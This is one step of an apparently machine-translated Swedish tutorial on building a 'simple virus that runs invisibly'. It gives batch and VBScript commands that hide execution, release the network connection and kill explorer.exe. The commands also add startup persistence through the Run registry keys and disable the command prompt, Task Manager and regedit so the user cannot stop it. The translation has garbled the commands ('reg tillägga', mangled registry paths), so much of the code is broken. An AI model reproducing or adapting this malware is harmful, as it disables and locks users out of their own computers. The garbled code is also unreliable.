Enkel virus som körs osynligt (3 / 4 steg)
Steg 3: Lägga till mer till kommandofilen
För närvarande kommandofilen ska se ut ungefär så här:utanför
gå till processen
CreateObject("Wscript.Shell"). Kör "" "& WScript.Arguments(0) &" "", 0, falska
: process
Skriv run.bat | hitta "CreateObject" | hitta /v "typ" > invis.vbs
CD %windir%\system32
ECHO wscript.exe "C:\windows\system32\invis.vbs" "Data_exe.bat" > Data_exe.bat
ECHO off > Data.bat
ECHO ipconfig/release >> Data.bat
ECHO taskkill explorer.exe >> Data.bat
ECHO mkdir %% slumpmässiga %% >> Data.bat
ECHO mkdir %% slumpmässiga %% >> Data.bat
reg tillägga "HKCU\software\microsoft\windows\currentversion\run" v säkerhet /t reg_sz d "% windir%\system32\Data_exe.bat" f
reg tillägga "HKLM\software\microsoft\windows\currentversion\run" v säkerhet /t reg_sz d "% windir%\system32\Data_exet" f
Nu vi kommer att lägga till lite mer, kan du det där användaren har mycket lite sätt att stoppa detta genom att helt enkelt förbjuda de vanligaste metoderna för att stoppa saker som detta, som Aktivitetshanteraren, kommandotolken och regedit.
Detta är ganska enkel att göra, bara lägga till följande rader till kommandofilen:
reg tillägga "HKLM\Software\Policies\Microsoft\Windows\System v DisableCMD/t REG_DWORD d 2 f
reg tillägga "HKCU\Software\Policies\Microsoft\Windows\System v DisableCMD/t REG_DWORD d 2 f
reg tillägga "HKLMSOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystem\\\ v DisableTaskMgr/t REG_DWORD d 1 f
reg tillägga "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem\\\\\ /v DisableTaskMgr t REG_DWORD d 1 f
reg tillägga "HKLMSOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystem\\\ v DisableRegistryTools/t REG_DWORD d 1 f
reg tillägga "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem\\\\\ /v DisableRegistryTools t REG_DWORD d 1 f